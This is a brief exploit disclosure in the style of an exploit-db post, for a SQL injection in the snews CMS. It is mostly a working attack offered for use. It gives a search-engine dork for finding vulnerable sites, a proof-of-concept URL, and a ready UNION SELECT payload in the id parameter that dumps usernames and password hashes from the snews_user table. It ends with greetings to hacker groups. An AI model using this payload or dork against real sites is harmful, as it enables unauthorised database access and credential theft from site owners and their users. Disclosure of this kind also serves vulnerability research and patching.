Title: CMS snews SQL Injection Vulnerability
Author: By onestree
Download: http://snewscms.com/
Tested on: ubuntu 12.10 / win 7
Keyword: inurl:"tanyakan pada rumput yang bergoyang"

*************************************************************

SQL poc:

http://www.2cto.com/snews/snews.php?act=shownews&id=[SQL]

Example:
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*

Thanks:

Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell

indonesiancoder - moeslimh4x0r - go-coder

special my hunny :*